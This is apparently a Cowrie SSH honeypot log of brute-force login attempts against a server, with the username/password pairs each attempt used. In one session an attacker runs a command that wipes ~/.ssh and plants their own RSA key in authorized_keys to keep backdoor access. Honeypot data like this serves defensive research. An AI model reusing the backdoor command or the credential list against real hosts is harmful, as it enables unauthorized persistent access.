{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:19:24.792859Z","src_ip":"77.75.56.63","session":"80a054f72b9b"}
{"eventid":"cowrie.login.failed","username":"manager","password":"abc123","message":"login attempt [manager/abc123] failed","sensor":"my-vps","timestamp":"2025-09-08T20:19:24.992902Z","src_ip":"77.75.56.63","session":"80a054f72b9b"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:19:26.032356Z","src_ip":"77.75.56.63","session":"80a054f72b9b"}
{"eventid":"cowrie.session.connect","src_ip":"103.206.72.2","src_port":46012,"dst_ip":"1.2.3.4","dst_port":22,"session":"276cb16df5b9","protocol":"ssh","message":"New connection: 103.206.72.2:46012 (1.2.3.4:22) [session: 276cb16df5b9]","sensor":"my-vps","timestamp":"2025-09-08T20:19:55.106216Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:19:55.108372Z","src_ip":"103.206.72.2","session":"276cb16df5b9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:19:55.289032Z","src_ip":"103.206.72.2","session":"276cb16df5b9"}
{"eventid":"cowrie.login.success","username":"root","password":"Mg123","message":"login attempt [root/Mg123] succeeded","sensor":"my-vps","timestamp":"2025-09-08T20:19:56.002239Z","src_ip":"103.206.72.2","session":"276cb16df5b9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T20:19:56.440683Z","src_ip":"103.206.72.2","session":"276cb16df5b9"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T20:19:56.441479Z","src_ip":"103.206.72.2","session":"276cb16df5b9"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T20:19:56.442411Z","src_ip":"103.206.72.2","session":"276cb16df5b9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:19:56.622111Z","src_ip":"103.206.72.2","session":"276cb16df5b9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T20:19:57.038019Z","src_ip":"103.206.72.2","session":"276cb16df5b9"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T20:19:57.038737Z","src_ip":"103.206.72.2","session":"276cb16df5b9"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T20:19:57.222489Z","src_ip":"103.206.72.2","session":"276cb16df5b9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:19:57.223350Z","src_ip":"103.206.72.2","session":"276cb16df5b9"}
{"eventid":"cowrie.session.connect","src_ip":"103.206.72.2","src_port":46124,"dst_ip":"1.2.3.4","dst_port":22,"session":"712f6e10c27d","protocol":"ssh","message":"New connection: 103.206.72.2:46124 (1.2.3.4:22) [session: 712f6e10c27d]","sensor":"my-vps","timestamp":"2025-09-08T20:19:57.393009Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:19:57.397078Z","src_ip":"103.206.72.2","session":"712f6e10c27d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:19:57.568234Z","src_ip":"103.206.72.2","session":"712f6e10c27d"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T20:19:58.266011Z","src_ip":"103.206.72.2","session":"712f6e10c27d"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:19:59.445764Z","src_ip":"103.206.72.2","session":"712f6e10c27d"}
{"eventid":"cowrie.session.connect","src_ip":"103.206.72.2","src_port":46126,"dst_ip":"1.2.3.4","dst_port":22,"session":"49cb4d13a248","protocol":"ssh","message":"New connection: 103.206.72.2:46126 (1.2.3.4:22) [session: 49cb4d13a248]","sensor":"my-vps","timestamp":"2025-09-08T20:19:59.622429Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:19:59.623735Z","src_ip":"103.206.72.2","session":"49cb4d13a248"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:19:59.806341Z","src_ip":"103.206.72.2","session":"49cb4d13a248"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T20:20:00.563012Z","src_ip":"103.206.72.2","session":"49cb4d13a248"}
{"eventid":"cowrie.session.closed","duration":"5.6","message":"Connection lost after 5.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:20:00.745012Z","src_ip":"103.206.72.2","session":"276cb16df5b9"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:20:00.746079Z","src_ip":"103.206.72.2","session":"49cb4d13a248"}
{"eventid":"cowrie.login.success","username":"root","password":"zhangting","message":"login attempt [root/zhangting] succeeded","sensor":"my-vps","timestamp":"2025-09-08T20:20:03.143063Z","src_ip":"212.227.125.160","session":"b153112554cf"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T20:20:03.162196Z","src_ip":"212.227.125.160","session":"b153112554cf"}
{"eventid":"cowrie.session.connect","src_ip":"77.75.56.63","src_port":59644,"dst_ip":"1.2.3.4","dst_port":22,"session":"0e4711666612","protocol":"ssh","message":"New connection: 77.75.56.63:59644 (1.2.3.4:22) [session: 0e4711666612]","sensor":"my-vps","timestamp":"2025-09-08T20:20:29.015961Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:20:29.016631Z","src_ip":"77.75.56.63","session":"0e4711666612"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:20:29.052220Z","src_ip":"77.75.56.63","session":"0e4711666612"}
{"eventid":"cowrie.login.failed","username":"dixi","password":"09N1RCa1Hs31","message":"login attempt [dixi/09N1RCa1Hs31] failed","sensor":"my-vps","timestamp":"2025-09-08T20:20:29.248691Z","src_ip":"77.75.56.63","session":"0e4711666612"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:20:30.287609Z","src_ip":"77.75.56.63","session":"0e4711666612"}
{"eventid":"cowrie.session.connect","src_ip":"103.206.72.2","src_port":39390,"dst_ip":"1.2.3.4","dst_port":22,"session":"6ae063098960","protocol":"ssh","message":"New connection: 103.206.72.2:39390 (1.2.3.4:22) [session: 6ae063098960]","sensor":"my-vps","timestamp":"2025-09-08T20:21:13.318577Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:21:13.320193Z","src_ip":"103.206.72.2","session":"6ae063098960"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:21:13.497201Z","src_ip":"103.206.72.2","session":"6ae063098960"}
{"eventid":"cowrie.login.failed","username":"ctf","password":"!","message":"login attempt [ctf/!] failed","sensor":"my-vps","timestamp":"2025-09-08T20:21:14.192271Z","src_ip":"103.206.72.2","session":"6ae063098960"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:21:15.368730Z","src_ip":"103.206.72.2","session":"6ae063098960"}
{"eventid":"cowrie.session.connect","src_ip":"216.107.136.92","src_port":58502,"dst_ip":"1.2.3.4","dst_port":22,"session":"b6f06dfe4443","protocol":"ssh","message":"New connection: 216.107.136.92:58502 (1.2.3.4:22) [session: b6f06dfe4443]","sensor":"my-vps","timestamp":"2025-09-08T20:21:34.751047Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:21:34.752404Z","src_ip":"216.107.136.92","session":"b6f06dfe4443"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:21:34.842916Z","src_ip":"216.107.136.92","session":"b6f06dfe4443"}
{"eventid":"cowrie.session.connect","src_ip":"77.75.56.63","src_port":45574,"dst_ip":"1.2.3.4","dst_port":22,"session":"d54a2d042dba","protocol":"ssh","message":"New connection: 77.75.56.63:45574 (1.2.3.4:22) [session: d54a2d042dba]","sensor":"my-vps","timestamp":"2025-09-08T20:21:34.995618Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:21:34.997314Z","src_ip":"77.75.56.63","session":"d54a2d042dba"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:21:35.233181Z","src_ip":"77.75.56.63","session":"d54a2d042dba"}
{"eventid":"cowrie.login.failed","username":"default","password":"password123","message":"login attempt [default/password123] failed","sensor":"my-vps","timestamp":"2025-09-08T20:21:35.242242Z","src_ip":"216.107.136.92","session":"b6f06dfe4443"}
{"eventid":"cowrie.login.failed","username":"dbadmin","password":"Welcome1","message":"login attempt [dbadmin/Welcome1] failed","sensor":"my-vps","timestamp":"2025-09-08T20:21:36.110704Z","src_ip":"77.75.56.63","session":"d54a2d042dba"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:21:36.334865Z","src_ip":"216.107.136.92","session":"b6f06dfe4443"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:21:37.279285Z","src_ip":"77.75.56.63","session":"d54a2d042dba"}
{"eventid":"cowrie.session.connect","src_ip":"103.206.72.2","src_port":60992,"dst_ip":"1.2.3.4","dst_port":22,"session":"be2d262f2bc7","protocol":"ssh","message":"New connection: 103.206.72.2:60992 (1.2.3.4:22) [session: be2d262f2bc7]","sensor":"my-vps","timestamp":"2025-09-08T20:22:35.037048Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:22:35.040684Z","src_ip":"103.206.72.2","session":"be2d262f2bc7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:22:35.217031Z","src_ip":"103.206.72.2","session":"be2d262f2bc7"}
{"eventid":"cowrie.login.failed","username":"super","password":"pass","message":"login attempt [super/pass] failed","sensor":"my-vps","timestamp":"2025-09-08T20:22:35.910942Z","src_ip":"103.206.72.2","session":"be2d262f2bc7"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:22:37.087434Z","src_ip":"103.206.72.2","session":"be2d262f2bc7"}
